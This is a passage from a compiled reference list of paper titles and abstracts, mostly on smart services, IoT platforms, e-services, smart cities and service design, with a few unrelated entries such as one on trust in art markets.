the amount of abstraction within the software architecture. In this paper we give a high-level view of what are the inherent trade-offs that stem from this process of abstraction and suggest how they could be tackled in these complex home automation systems. 
More specifically we focus our analysis on two problems: concurrent execution of multiple plans and failure detection. --- paper_title: Continuous Quality Improvement of IT Processes based on Reference Models and Process Mining paper_content: The inherent quality of business processes increasingly plays a significant role in the economic success of an organization. More and more business processes are supported through IT processes. In this contribution, we present a new approach which allows the continuous quality improvement of IT processes by the interconnection of IT Infrastructure Library (ITIL) reference model and process mining. On the basis of the reference model, to-be processes are set and key indicators are determined. As-is processes and their key indicators derived by process mining are subsequently compared to the to-be processes. This new approach enables the design and control of ITIL based customer support processes which will be trialed in a practice case of a customer relationship management (CRM) system. The procedural models, as well as its results, are introduced in this publication. --- paper_title: Enhancing Literature Review Methods - Evaluation of a Literature Search Approach based on Latent Semantic Indexing paper_content: Literature search, as a fundamental and time-consuming step in a literature research process, is part of many established scientific research methods. The facilitated access to scientific resources requires an increasing effort to conduct comprehensive literature reviews. We address the lack of semantic approaches in this context by proposing and evaluating our Tool for Semantic Indexing and Similarity Queries (TSISQ) for the enhancement of established literature review methods. Its applicability is evaluated in different environments and search cases covering realistic applications. Results indicate that TSISQ can increase efficiency by saving valuable time in finding relevant literature in a desired research field, improve the quality of search results, and enhance the comprehensiveness of a review by identifying sources that otherwise would not have been considered. The target audience includes all researchers who need to efficiently gain an overview of a specific research field and refine the theoretical foundations of their research. --- paper_title: Willingness to believe and betrayal aversion: the special role of trust in art exchanges paper_content: Lack of transparency is considered a major functional deficiency of art markets. The uniqueness of artworks, the subjectivity of the pleasure component in their appeal, the unequal access to verifiable information make information asymmetries, and their potential opportunistic use, one of the dominant characteristics of this market and one that is very difficult to remedy. Yet, art goods are not simply risk-intensive goods, as are financial assets. Their complexity and specificity have given ample room, not only for calls for greater transparency and more credible information, but also for building trust-based long-term relationships. Drawing on the distinction between decisions involving risk and decisions involving trust, the paper discusses how relational trust, based on confidentiality and reciprocity, has helped compensate for the lack of transparency to increase the overall trustworthiness of art markets. Yet, trust-based exchanges have a downside too, since trust, once gained, can also be used opportunistically to defend and exploit positions of privilege and power.
This form of strategic trust can become an obstacle to the diffusion of information and the adoption of credible norms of transparency. --- paper_title: Analyzing the past to prepare for the future: Writing a literature review paper_content: A review of prior, relevant literature is an essential feature of any academic project. An effective review creates a firm foundation for advancing knowledge. It facilitates theory development, closes areas where a plethora of research exists, and uncovers areas where research is needed. --- paper_title: Single-RF MIMO-OFDM system with beam switching antenna paper_content: In this paper, we investigate the replica interference problem of a multiple input multiple output (MIMO) receiver with a beam switching antenna (BSA) within the orthogonal frequency division multiplexing (OFDM) framework. Our frequency-domain analysis has revealed the following important findings: (i) without co-existing system, replica interference in the system can be completely avoided as long as the beam pattern switching rate of the BSA receiver is an integer multiple of the product of the OFDM sampling rate and the number of receiving beam patterns and (ii) with co-existing systems, replica interference cannot always be avoided because co-existing systems may induce replicas in the operating frequency bands of the system. We present a replica interference criterion that depends on the co-existing status and users’ beam switching capabilities. Based on our findings, we propose various replica interference avoidance (RINA) strategies for different co-existing and cooperating network scenarios. In addition, the overall network operation principles of the proposed RINA strategy are presented. Simulation results verify that the proposed MIMO-OFDM system with a BSA successfully provides both MIMO and OFDM benefits, thereby resolving replica interference issues. --- paper_title: Designing wrapper components for e-services in integrating heterogeneous systems paper_content: Component-based approaches are becoming more and more popular to support Internet-based application development. Different component modeling approaches, however, can be adopted, obtaining different abstraction levels (either conceptual or operational). In this paper we present a component-based architecture for the design of e-applications, and discuss the concept of wrapper components as building blocks for the development of e-services, where these services are based on legacy systems. We discuss their characteristics and their applicability in Internet-based application development. --- paper_title: Towards a Consistent Service Lifecycle Model in Service Governance paper_content: Introducing an SOA in a company brings new challenges for the existing management. Small loosely coupled services allow the Enterprise Architecture to flexibly adapt to existing business processes that themselves depend on changing market environments. SOA, however, introduces a new implicit system complexity. Service Governance approaches address this issue by introducing management processes and techniques, and best practices to cope with the new heterogeneity. Service lifecycle management is one aspect. Existing definitions of service lifecycles vary greatly.. In this paper, we compare existing service lifecycle approaches concerning defined phases and process. In particular, we challenge the purpose of the distinctions made between design time, runtime, and change time. 
Concluding, we propose a consolidated service lifecycle model for usage in Service Governance. --- paper_title: Sensing as a Service Model for Smart Cities Supported by Internet of Things paper_content: The world population is growing at a rapid pace. Towns and cities are accommodating half of the world's population thereby creating tremendous pressure on every aspect of urban living. Cities are known to have large concentration of resources and facilities. Such environments attract people from rural areas. However, unprecedented attraction has now become an overwhelming issue for city governance and politics. The enormous pressure towards efficient city management has triggered various Smart City initiatives by both government and private sector businesses to invest in ICT to find sustainable solutions to the growing issues. The Internet of Things (IoT) has also gained significant attention over the past decade. IoT envisions to connect billions of sensors to the Internet and expects to use them for efficient and effective resource management in Smart Cities. Today infrastructure, platforms, and software applications are offered as services using cloud technologies. In this paper, we explore the concept of sensing as a service and how it fits with the Internet of Things. Our objective is to investigate the concept of sensing as a service model in technological, economical, and social perspectives and identify the major open challenges and issues. --- paper_title: Personalization vs. Customization: Which is More Effective in e-Services? paper_content: More flexible and agile Information Technology (IT) architecture is needed by a firm to respond to dynamic and competitive business environments. Web Service, which is defined as a software construct that exposes business functionality over the Internet, is considered to be the next vision to provide not only new IT architecture and strategies for enterprises, but also a technological basis for design/redesign of business processes. This research proposes a framework and methodology to design business processes with Web services. A formal model, which reflects strategic, economic, and structural perspectives, to identify and evaluate alternative Web services portfolio in business processes is proposed. The objective of this research is to provide a comprehensive and theoretical formulation for Web services to design/redesign business processes and business networks. --- paper_title: Towards Smart Service Networks: An Interdisciplinary Service Assessment Metrics paper_content: Service Networks (SNs) are open systems accommodating the co-production of new knowledge and services through organic peer-to-peer interactions. Key to broad success of SNs in practice is their ability to foster and ensure a high performance. By performance we mean the joint effort of tremendous interdisciplinary collaboration, cooperation and coordination among the network participants. However, due to the heterogeneous background of such participants (i.e., business, technical, etc.), different interpretations of the shared terminology are likely to happen. Thus, confusion may appear in the multi-disciplinary communication of SNs participants which in turn may lead to performance anomalies. To deal with such a problem, we propose a novel framework of bi-dimensional (business vs technical) performance metric indicators built on the basis of a systems thinking mindset. 
By using our framework, a holistic picture of the multiple dimensions and structure of SNs is provided, so that the interdisciplinary service participants have a correct understanding of the service scope and required resources in operation. Moreover, and most importantly, it provides a way to examine the performance traceability of the services within a SN. --- paper_title: A software framework for enabling smart services paper_content: ‘Smart’ becomes a buzzword in many sectors of the society. Among them, Smart Service is an emerging paradigm for delivering services with ‘smartness’ features. A key ingredient of smart services is various types of contexts including mobile and social contexts. With the advent of sensor technology and availability in mobile devices, contexts become a key source of information from which situations can be inferred. And, situation-specific services have a high potential of being smart services. However, a number of fundamental technical issues remain unresolved, especially in the area of software framework for developing and deploying smart services. In this paper, we present a software framework for context-aware smart life services, Smart Service Framework (SSF). We begin by defining smart services with key characteristics, and define our architectural design of the SSF. We also define a process for provisioning smart services. And, we specify guidelines and algorithms needed for carrying out the four activities in the process. --- paper_title: A Socio-Technical Approach to Study Consumer-Centric Information Systems. paper_content: Given the unprecedented role of digital service platforms in private life, this research sets out to identify the mechanisms that are designed into information systems with the purpose to increase consumer centricity. We evaluate the consumer centricity of an information system against three reflective indicators, that is the degree of need orientation, value co-creation and relationship orientation and conceptualize consumer centricity as the ability to align social and technical information system components. We employ a positivist, explanatory case study approach to test three hypotheses on system component alignment in cases from three domains (gaming, social networking, and video sharing). We found preliminary evidence for three alignment mechanisms that increase consumer centricity. With this research, we plan to contribute to the literature on consumer-centric information systems by elaborating and empirically grounding a socio-technical approach to study mechanisms and their joint application to increase consumer centricity in information systems. --- paper_title: The next industrial revolution: Integrated services and goods paper_content: The outputs or products of an economy can be divided into services products and goods products (due to manufacturing, construction, agriculture and mining). To date, the services and goods products have, for the most part, been separately mass produced. However, in contrast to the first and second industrial revolutions which respectively focused on the development and the mass production of goods, the next — or third — industrial revolution is focused on the integration of services and/or goods; it is beginning in this second decade of the 21st Century.
The Third Industrial Revolution (TIR) is based on the confluence of three major technological enablers (i.e., big data analytics, adaptive services and digital manufacturing); they underpin the integration or mass customization of services and/or goods. As detailed in an earlier paper, we regard mass customization as the simultaneous and real-time management of supply and demand chains, based on a taxonomy that can be defined in terms of its underpinning component and management foci. The benefits of real-time mass customization cannot be over-stated as goods and services become indistinguishable and are co-produced — as “servgoods” — in real-time, resulting in an overwhelming economic advantage to the industrialized countries where the consuming customers are at the same time the co-producing producers. --- paper_title: Exploring the role of E-maintenance for value creation in service provision paper_content: Technological innovations has always played an important role in economic growth and industrial productivity, but they have also potential to influence service industry. In particular, they can offer support to the process of servitization in manufacturing companies. This article presents a study regarding the prospective value that different technological innovations can offer to maintenance service provision. A review of different baseline technologies and a categorization of several types of E-maintenance tools and applications has been carried out in order to understand the new functionalities that can potentially bring to the provision of smart maintenance services. Moreover, a value analysis method for representing the contribution of tool categories to several value dimensions is presented here. This method can be used for identifying the best technological solution, matching both customer value and provider value, i.e. conforming a win-win situation for the parties involved in the service provision. Some preliminary results based on a survey are eventually given as a first test of its applicability. --- paper_title: Contrasting risk perceptions of technology-based service innovations in inter-organizational settings paper_content: Despite the rapid growth and potential of technology-based services, managers' greatest challenges are gaining customer acceptance and increasing usage of these new innovative services. In the B2C field, studies of self-service technology show that perceived risk is an important factor influencing the use of service technology. Though prior research explores different risk types that emerge in consumer settings, risk perception in the B2B setting lacks a detailed examination of different risk types influencing technology-based service adoption. Data from 49 qualitative interviews with providers and customers in two different B2B industries inform this study. The findings emphasize the importance of functional and financial risks in a B2B context and show that business customers' personal and psychological fears hinder their use of technology-based services. Results highlight differences in risk perception and evaluation between customers and providers. --- paper_title: Digital Service Innovation from Open Data: Exploring the Value Proposition of an Open Data Marketplace paper_content: Open data marketplaces have emerged as a mode of addressing open data adoption barriers. However, knowledge of how such marketplaces affect digital service innovation in open data ecosystems is limited. 
This paper explores their value proposition for open data users based on an exploratory case study. Five prominent perceived values are identified: lower task complexity, higher access to knowledge, increased possibilities to influence, lower risk and higher visibility. The impact on open data adoption barriers is analyzed and the consequences for ecosystem sustainability is discussed. The paper concludes that open data marketplaces can lower the threshold of using open data by providing better access to open data and associated support services, and by increasing knowledge transfer within the ecosystem. --- paper_title: High Tech and High Touch: A Framework for Understanding User Attitudes and Behaviors Related to Smart Interactive Services paper_content: Smart interactive services, in contrast with other technology-based services, require significant human-to-human interaction and collaboration in addition to the service provided by the embedded technology itself. The authors’ foundational Delphi study confirms smart interactive services (e.g., remote diagnosis, remote repair of equipment, and telemedicine) are a rapidly growing innovation category across industries. Yet, gaining user acceptance of these types of services presents a significant challenge for managers. To address this challenge, the authors employ a grounded theory approach, drawing on depth interviews, to develop a framework of barriers and facilitators to users’ attitudinal and behavioral responses to smart interactive services. The findings reveal a new set of beliefs that are critical in this context. These beliefs are tied to the human element and specifically pertain to beliefs about the “service counterpart (SC),” who is the provider’s employee controlling the technology. Control, t... --- paper_title: Smart governance for smart industries paper_content: In this paper, we present a vision of smartness as an environment in which humans and devices, visible and unseen, provide a wide range of e-services trying to make a person's life easier, more comfortable and more efficient. Economic and privacy issues are discussed as the most challenging. We argue that only direct income from consumers of e-services may guarantee sustainable development of smart industries. We present threats coming from smart industries and smart governance which may abuse trust of people who are served. We indicate the triple role of smart governance: first, to become smart and avoid a smartness gap between the public and private sectors; second, to boost smart industries, while third, and simultaneously, enforcing the codes of protecting privacy. --- paper_title: Interoperable eHealth platform for personalized smart services paper_content: Independent living is one of the main challenges linked to an increasing ageing population and concerns both patients and healthy elderlies. A lot of research has focused on the area of ambient-assisted living (AAL) technologies towards an intelligent caring home environment able to offer personalized context-aware applications to serve the user's needs. This paper proposes the use of advised sensing, context-aware and cloud-based lifestyle reasoning to design an innovative eHealth platform that supports highly personalized smart services to primary users. The architecture of the platform has been designed in accordance with the interoperability requirements and standards as proposed by ITU-T and Continua Alliance. 
In particular, we define the interface dependencies and functional requirements needed to allow eCare and eHealth vendors to manufacture interoperable sensors, ambient and home networks, telehealth platforms, health support applications and software services. Finally, data mining techniques in relation to the proposed architecture are also proposed to enhance the overall AAL experience of the users. --- paper_title: A service-oriented framework to the design of information system service paper_content: The beginning of this century is marked by a paradigm shift due to the move of the production focus from a goods-dominant to a service-dominant orientation. At the same time, manufacturing automation and integration are undergoing changes, which open the possibility for classical model oriented products to be replaced by service models, supported by cognitive information systems. This paper analyzes a proposal to achieve a sound design process for service systems, which follows the model driven tendency. In fact, the aim is to bring together practical and formal approaches, and therefore, to propose a good design discipline based on SOMF (Service Oriented Model Framework). Based on this model-driven approach, a new environment was developed which supports elicitation, modeling and requirements analysis supported by semi-formal methods (SOMF and UML) and formal methods (by using SysML and Petri Nets). The proposed method is applied to a case study based on an urban Smart Grid. --- paper_title: Design of emerging digital services: a taxonomy paper_content: There has been a gigantic shift from a product based economy to one based on services, specifically digital services. From every indication it is likely to be more than a passing fad and the changes these emerging digital services represent will continue to transform commerce and have yet to reach market saturation. Digital services are being designed for and offered to users, yet very little is known about the design process that goes behind these developments. Is there a science behind designing digital services? By examining 12 leading digital services, we have developed a design taxonomy to be able to classify and contrast digital services. What emerged in the taxonomy were two broad dimensions; a set of fundamental design objectives and a set of fundamental service provider objectives. This paper concludes with an application of the proposed taxonomy to three leading digital services. We hope that the proposed taxonomy will be useful in understanding the science behind the design of digital services. --- paper_title: Cloud semantic-based dynamic multimodal platform for building mhealth context-aware services paper_content: Currently, everybody wishes to access applications from a wide variety of devices (PC, Tablet, Smartphone, Set-top-box, etc.) in situations including various interactions and modalities (mouse, tactile screen, voice, gesture detection, etc.). At home, users interact with many devices and get access to many multimedia oriented documents (hosted on local drives, on cloud storage, online streaming, etc.) in various situations with multiple (and sometimes at the same time) devices. The diversity and heterogeneity of user profiles and service sources can be a barrier to discovering the available service sources, which can come from anywhere in the home or the city.
The objective of this paper is to suggest a meta-level architecture for raising the level of abstraction of context concepts for heterogeneous profiles and service sources via a top-level ontology. We particularly focus on context-aware mHealth applications and propose an ontologies-based architecture, OntoSmart (a top-ONTOlogy SMART), which provides adapted services that help users broadcast multimedia documents and use them with interactive services, in order to help maintain elderly people at home and satisfy their preferences. In order to validate our proposal, we have used Semantic Web, Cloud and Middleware technologies by specifying and matching OWL profiles, and experimented with their usage on several platforms. --- paper_title: User involvement in the innovation process: Development of a framework for e-services paper_content: This paper focuses on user involvement in the innovation process in the area of services and especially e-services, a highly unexplored topic. Our research is built on a comprehensive review of the resource-based view, customer/user integration and e-services. A qualitative investigation is performed to explore the situation concerning user involvement in several different companies offering e-services. Based on our findings and previous research, a framework for analyzing existing involvement activities and for the generation of new forms of user involvement in the innovation process is developed. The framework consists of six dimensions and also takes into account internal and external factors affecting the company's innovation activities. --- paper_title: Adaptive blurring of sensor data to balance privacy and utility for ubiquitous services paper_content: Given the trend towards mobile computing, the next generation of ubiquitous "smart" services will have to continuously analyze surrounding sensor data. More than ever, such services will rely on data potentially related to personal activities to perform their tasks, e.g. to predict urban traffic or local weather conditions. However, revealing personal data inevitably entails privacy risks, especially when data is shared with high precision and frequency. For example, by analyzing precise electric consumption data, it can be inferred whether a person is currently at home; however, this can also empower new services such as a smart heating system. Access control (forbid or grant access) or anonymization techniques are not able to deal with such a trade-off because they either completely prohibit access to data or lose source traceability. Blurring techniques, by tuning data quality, offer a wide range of trade-offs between privacy and utility for services. However, the number of ubiquitous services and their data quality requirements lead to an explosion of possible configurations of blurring algorithms. To manage this complexity, in this paper we propose a platform that automatically adapts (at runtime) blurring components between data owners and data consumers (services). The platform searches for the optimal trade-off between service utility and privacy risks using multi-objective evolutionary algorithms to adapt the underlying communication platform. We evaluate our approach on a sensor network gateway and show its suitability in terms of i) effectiveness in finding an appropriate solution, and ii) efficiency and scalability.
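To make the privacy-utility trade-off described in the adaptive-blurring entry above more tangible, here is a minimal Python sketch. It is not the authors' platform: their multi-objective evolutionary search is replaced by a plain exhaustive scan over candidate blurring configurations, and the utility and risk scores are toy stand-ins invented for illustration.

```python
# Minimal sketch of the privacy/utility trade-off behind adaptive sensor blurring.
# The real platform uses multi-objective evolutionary search; a simple exhaustive
# scan over hypothetical configurations stands in for it here.

import random
import statistics

def blur(readings, rounding, noise_std):
    """Degrade a sensor stream by rounding and additive Gaussian noise."""
    return [round(x + random.gauss(0.0, noise_std), rounding) for x in readings]

def utility(original, blurred):
    """Toy utility: 1 minus the normalized mean absolute error of the blurred stream."""
    mae = statistics.fmean(abs(o - b) for o, b in zip(original, blurred))
    spread = max(original) - min(original) or 1.0
    return max(0.0, 1.0 - mae / spread)

def privacy_risk(rounding, noise_std):
    """Toy risk model: finer rounding and less noise mean higher re-identification risk."""
    return 1.0 / (1.0 + noise_std + (3 - rounding))

def pareto_front(configs):
    """Keep configurations that are not dominated in (utility, risk)."""
    front = []
    for c in configs:
        dominated = any(
            d["utility"] >= c["utility"] and d["risk"] <= c["risk"]
            and (d["utility"] > c["utility"] or d["risk"] < c["risk"])
            for d in configs
        )
        if not dominated:
            front.append(c)
    return front

if __name__ == "__main__":
    # Simulated stream, e.g. household power or temperature readings.
    readings = [21.0 + 0.1 * i + random.gauss(0, 0.2) for i in range(100)]
    candidates = []
    for rounding in (0, 1, 2):                  # coarser -> finer reporting
        for noise_std in (0.0, 0.5, 1.0, 2.0):  # less -> more perturbation
            blurred = blur(readings, rounding, noise_std)
            candidates.append({
                "rounding": rounding,
                "noise_std": noise_std,
                "utility": utility(readings, blurred),
                "risk": privacy_risk(rounding, noise_std),
            })
    for cfg in pareto_front(candidates):
        print(cfg)
```

In a real deployment the scoring functions would come from the consuming services' accuracy requirements and from an actual inference-risk model, rather than from these placeholders.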
--- paper_title: A Context-Aware Services Development Model paper_content: Currently, context models focus more on expression ability rather than on automatic deployment and execution capability. A context-aware platform is also required to support the modeling and automatic deployment and execution of the context-aware system. This paper aims to build an executable context model and define the architecture of the context-aware system as well. Firstly, a context-aware services development model is proposed, and then the architecture of the context-aware system is defined. The lifecycle of such a system includes two phases, namely the design phase and the running phase. In the service design phase, the development model can describe the user's context, situation, and services' configuration information. In the running phase, the execution engine can build instances of a model and navigate its execution, namely receive context-change events, manage the user's scene transitions and invoke the context-aware services according to the scene's configuration. In addition, the model is exemplified with an elder health monitoring model. --- paper_title: Conceptual framework for services creation/development environment in telecom domain paper_content: The telecom service providers (fixed and mobile) understand that they must bring in new smart services in order to attract new customers, retain existing ones and increase revenue. The challenges and goals for doing so are as follows: determining which services are needed; introducing more services in a faster manner and at lower costs; delivering innovative services in a way that allows existing users to migrate smoothly to new ones. These goals could not be achieved with traditional closed and proprietary network infrastructure, as the vendor lock-in involved in that infrastructure results in a limited scope of services, and dependency on old business models. New services require a much greater degree of system flexibility, performance and scalability, as well as open standards. Next Generation Networks (NGN) provide the means for enabling agile service creation capabilities that facilitate better user experiences by integrating both new and legacy services across any access. However, NGNs involve complex structures even for simple services as they consist of a large number of building blocks and necessitate hierarchical models with a lot of parallel subsystems. Thus, particular attention has to be paid to understanding and modelling the performance of these systems. The rationale of this paper lies in developing a design and engineering methodology (based on a mathematical foundation) that addresses the service creation aspects for those fields in which traditional approaches will not work for NGNs. --- paper_title: Case study: From legacy to connectivity migrating industrial devices into the world of smart services paper_content: Europe has launched multiple initiatives and research projects to remain competitive in a globalized world and keep industry and manufacturing on-shore. Funded by the EU and member countries, project ARROWHEAD[1] focuses on research and innovation for collaborative automation using interoperable services for smart production, to improve quality, efficiency, flexibility and cost competitiveness.
This includes an important new aspect called “Smart Services”, which aims to apply SOA (service oriented architecture) to maintenance and service of production systems and its parts, which still carry a huge potential for further gains in cost and energy savings. However, there will be no “big bang”. How can we turn present-day variety of diverse, specialized, and legacy loaded embedded systems into connected, SOA based cooperating participants of the Internet of Things (IoT)? This case study portrays the solution followed in ARROWHEAD WP1.1, for devices used in end-ofline (EoL) test systems in automotive powertrain production. --- paper_title: Smart tourism: foundations and developments paper_content: Smart tourism is a new buzzword applied to describe the increasing reliance of tourism destinations, their industries and their tourists on emerging forms of ICT that allow for massive amounts of data to be transformed into value propositions. However, it remains ill-defined as a concept, which hinders its theoretical development. The paper defines smart tourism, sheds light on current smart tourism trends, and then lays out its technological and business foundations. This is followed by a brief discussion on the prospects and drawbacks of smart tourism. The paper further draws attention to the great need for research to inform smart tourism development and management. --- paper_title: Digital service analysis and design: the role of process modelling paper_content: Digital libraries are evolving from content-centric systems to person-centric systems. Emergent services are interactive and multidimensional, associated systems multi-tiered and distributed. A holistic perspective is essential to their effective analysis and design, for beyond technical considerations, there are complex social, economic, organisational, and ergonomic requirements and relationships to consider. Such a perspective cannot be gained without direct user involvement, yet evidence suggests that development teams may be failing to effectively engage with users, relying on requirements derived from anecdotal evidence or prior experience. In such instances, there is a risk that services might be well designed, but functionally useless. This paper highlights the role of process modelling in gaining such perspective. Process modelling challenges, approaches, and success factors are considered, discussed with reference to a recent evaluation of usability and usefulness of a UK National Health Service (NHS) digital library. Reflecting on lessons learnt, recommendations are made regarding appropriate process modelling approach and application. --- paper_title: BIT — A framework and architecture for providing digital services for physical products paper_content: Mobile phones are increasingly able to read auto-id labels, such as barcodes or RFID tags. As virtually all consumer products sold today are equipped with such a label, this opens the possibility for a wide range of novel digital services building on physical products. In this paper, we discuss the problems that arise when such novel applications are deployed, and present a unified system architecture for providing mobile phone-based digital services in the Internet of Things, called BIT. BIT aims to be a “single point of interaction” for users when accessing the services of a variety of tagged objects. 
BIT also aids service developers and product manufacturers in deploying services linked to tagged products, by providing a cross-device development and deployment framework. We have used BIT to quickly implement nine diverse services in a prototypical fashion, and report on our initial experiences with the framework. --- paper_title: Strategies in Smart Service Systems Enabled Multi-sided Markets: Business Models for the Internet of Things paper_content: The Internet of Things has the potential to disrupt industries through changing products, services, and business models just as the Internet did in the '90s. Machine-to-machine communication is at the core of the Internet of Things. Machines that we interact with in everyday life will start interacting with each other, collect data, and even use advances in data technologies to make decisions for us. Organizations, in order to achieve the highest profit, should also redesign their business service models conscientiously around externalities across markets that link through platforms and be specific about which markets to serve. In this research, we aim to build business ownership strategies to further the two-sided markets and platforms literature. Herein, we focus on a number of business service models that link four sides of a market, and compare the advantages and disadvantages of network externalities generated by the Internet of Things in each model. --- paper_title: Global Sensor Modeling and Constrained Application Methods Enabling Cloud-Based Open Space Smart Services paper_content: The deployment and provisioning of intelligent systems and utility-based services will greatly benefit from a cloud-based intelligent middleware framework, which could be deployed over multiple infrastructure providers (such as smart cities, hospitals, campus and private enterprises, offices, etc.) in order to deliver on-demand access to smart services. This paper introduces the formulation of an open source integrated intelligent platform as a solution for integrating global sensor networks, providing design principles for cloud-based intelligent environments, and discusses the infrastructure's functional modules and their implementation. The paper briefly reviews the technologies enabling the framework, with emphasis on the on-demand establishment of smart city services based on the automated formulation of ubiquitous intelligence of Internet-connected objects. The framework introduced is founded on the GSN infrastructure. The framework leverages the W3C SSN-XG formal language and the IETF COAP protocol, providing support for enabling intelligent (sensor-object) services. The service requirements for a particular smart city scenario are introduced, and initial implementations and results from the performed simulations are studied and discussed. --- paper_title: Ubiquitous Infrastructure and Smart Service on City Gas Environments in Korea paper_content: The information technology paradigm shifts to a smart service environment, as ubiquitous technologies are used in the latest industry trend. The major features of ubiquitous smart services are the high dynamism and heterogeneity of their environment and the need for context awareness. In order to address these features, it is necessary to develop middleware that meets various new requirements. This paper presents the design of middleware for ubiquitous smart services, enhancing the safety and reliability of the city gas environment in Korea.
The objective of this paper is to provide a cornerstone for constructing the framework of intelligent infrastructure and services for autonomic management. --- paper_title: Developing Advanced Context Aware Tools for Mobile Maintenance paper_content: The rapid technological progress in the domains of wireless sensor networks, mobile application development and computational intelligence has fueled the construction of "smart" environments in both domestic and industrial settings. Such environments are equipped with a wide range of sensors, identification tags and interaction devices, capable of sensing, recording, interpreting and reacting to human activity and presence. Context-awareness constitutes a major challenge for developers of smart services, since both design and implementation are increasingly supported by widely adopted frameworks and well-structured tools. The value-adding features of context-based services find their way into many industrial systems through the adoption of mobile computing. Acting as a constant context monitoring agent, a tablet or a smartphone can expand the capacity of a shop floor system actor to carry out asset management tasks. Context interpretation and system adaptation are highly specialized processes that essentially use predefined or dynamically built semantics to filter and configure the mobile actor's access session. In this paper we discuss the context semantics for an IT infrastructure that serves engineering asset management and specifically supports maintenance practice and planning. Evaluating the available software methodologies that can drive the implementation of such an infrastructure, we perform a suitability study for the development of a maintenance management and a condition monitoring portable client. Our goal is to identify and assess the weighted significance of a domain-focused set of functional parameters, used to define a context-based mobile tool scaled for industrial shop-floor complexity. --- paper_title: Network ontology and dynamics analysis for collaborative innovation in digital services paper_content: With the advances of digital technologies and participative webs of services, knowledge-intensive digital services have thrived on a rapidly expanding platform-based network economy. There is a great need for comprehensive research on knowledge-based analysis of social network and business network evolution to facilitate the collaborative development of digital services. This research aims to develop an ontology-guided analysis of networking to facilitate the formation of the innovation network to create new digital services. Central to the research is a dynamic ontology construct that could articulate the evolution of the social and business networks driven by the prospects of value creation, with networking structure and routines contributing to recognizing, engaging, and mobilizing key actors and resources. Based on a prototype model and a series of case studies of the emerging knowledge-intensive service industries, this research explores the potential of the model in adapting to the heterogeneity of the service demands and collaboration mechanisms in the service network. Through in-depth model-based analysis and synthesis of the emerging digital service activities, this research expects to develop an ontology-based platform for knowledge creation and a network management system to capture the extensive opportunities for value creation in participative webs of services in the experience economy.
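The mobile-maintenance entry above describes context semantics that "filter and configure the mobile actor's access session". The sketch below illustrates that general pattern with a few hypothetical rules in Python; the roles, locations and function names are assumptions for illustration, not the tool described in the paper.

```python
# Illustrative sketch of context-based session filtering for a mobile maintenance
# client: each rule maps a context predicate to the client functions it enables.
# Rules, roles and function names are hypothetical; a real system would derive
# them from domain ontologies and asset-management policies.

from dataclasses import dataclass

@dataclass
class Context:
    role: str           # e.g. "technician", "operator"
    location: str       # e.g. "shop_floor", "remote"
    machine_state: str  # e.g. "running", "stopped", "fault"

# Each rule: (predicate over the context, functions enabled when it holds).
RULES = [
    (lambda c: c.role == "technician" and c.location == "shop_floor",
     {"view_condition_data", "acknowledge_alarm", "start_work_order"}),
    (lambda c: c.role == "technician" and c.machine_state == "fault",
     {"view_fault_history", "request_spare_parts"}),
    (lambda c: c.role == "operator",
     {"view_condition_data"}),
    (lambda c: c.location == "remote",
     {"view_condition_data", "view_fault_history"}),
]

def configure_session(context: Context) -> set:
    """Union of the functions enabled by every rule matching the current context."""
    enabled = set()
    for predicate, functions in RULES:
        if predicate(context):
            enabled |= functions
    return enabled

if __name__ == "__main__":
    ctx = Context(role="technician", location="shop_floor", machine_state="fault")
    print(sorted(configure_session(ctx)))
```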
--- paper_title: Towards Personalized Smart City Guide Services in Future Internet Environments paper_content: The FI-CONTENT project aims at establishing the foundation of a European infrastructure for developing and testing novel smart city services. The Smart City Services Platform will develop enabling technology for SMEs and developers to create services offering residents and visitors to cities smart services that enhance their city visit or daily life. We have made use of generic, specific and common enablers to develop a reference implementation, the Smart City Guide web app. The basic information is provided by the Open City Database, an open source specific enabler that can be used for any city in Europe. Recommendation as a Service is an enabler that can be applied to many use cases; here we describe how we integrated it into the Smart City Guide. The use cases will be iteratively improved and upgraded during regular iterative cycles based on feedback gained in lab and field trials at the experimentation sites. As the app is transferable to any city, it will be tested at a number of experimentation sites. --- paper_title: MoSS: Mobile Smart Services for ubiquitous network management paper_content: We present an intelligence-based mobile solution addressing product life cycle and overall network management functions. Traditional network and service management systems rely on basic inventory information periodically collected from the network in order to establish the basic "Install Base" network view. Such collection systems, however, still require manual human manipulation, given that the required devices' electronically embedded predefined parameters are often inaccurate or absent. Leveraging mobile agents and ubiquitous computing in networks, we developed the Mobile Smart Services (MoSS), a location-aware solution as well as a novel interactive interface to improve the collected parameters and the Return Material Authorization (RMA) user experience. The fluid interaction, mobility, and efficiency of the system allow network service providers and customers to solve network management problems. The applications developed also enable ubiquitous inventory management, intelligent contract management and effective system diagnosis to improve productivity in complicated network systems. --- paper_title: Toward the construction knowledge economy: The e-cognos project paper_content: The paper focuses upon the contribution that knowledge management portals can make to the enhancement, development and improvement of professional expertise in the Construction domain. The paper is based on the e-COGNOS project, which aims at specifying and developing an open model-based infrastructure and a set of tools that promote consistent knowledge management within collaborative construction environments. The specified solution emerged from a comprehensive analysis of the business and information / knowledge management practices of the project end-users. The system architecture uses a Construction-specific ontology as a basis for specifying adaptive mechanisms that can organise documents according to their contents and interdependencies, while maintaining their overall consistency. e-COGNOS has a web-based infrastructure that will include services allowing users to create, capture, index, retrieve and disseminate knowledge. It also promotes the integration of third-party services, including proprietary tools. The e-COGNOS approach will be tested and evaluated through a series of field trials.
This will be followed by the delivery of business recommendations regarding the deployment of e-COGNOS in the construction sector. The research is ongoing and supported by the European Commission under the IST programme – Key Action II --- paper_title: Prototyping Smart City applications over large scale M2M testbed paper_content: Many cities around the globe are adopting the use of Information and Communication Technology (ICT) as part of a strategy to transform into Smart Cities. These will allow cities in the developing world to cope with the ever increasing demand for services such as an effective electricity supply, healthcare and water management. Machine-to-Machine (M2M) communication standards play a vital role in enabling the development of Smart Cities by supporting new innovative services. Although Smart City services offer an exciting future, many challenges still have to be addressed in order to allow for mainstream adoption. This work focuses on issues related to prototyping Smart City services that utilize standardised M2M middleware platforms. In addition, the use of an inter-continental testbed for Smart City applications as an enabler for innovative, automated and interactive services is presented. The services developed will use an architecture which is based on the Smart City framework developed as part of the Testbeds for Reliable Smart City Machine-to-Machine Communication (TRESCIMO) project. These services will also serve as means to validate the use of Smart services within an African City's context. In addition, the architecture is validated by taking into account various real world use cases for Smart City applications. --- paper_title: Smart servitization within the context of industrial user–supplier relationships: contingencies according to a machine tool manufacturer paper_content: Advanced manufacturing technologies (AMT) have been hailed as enablers to make industrial products and operations smart. The present paper argues that AMT can not only form a lever for developing smart goods and smart production environments, but can likewise form a basis to offer smart services and to propose servitized earning or payment models to industrial users. We do so on the 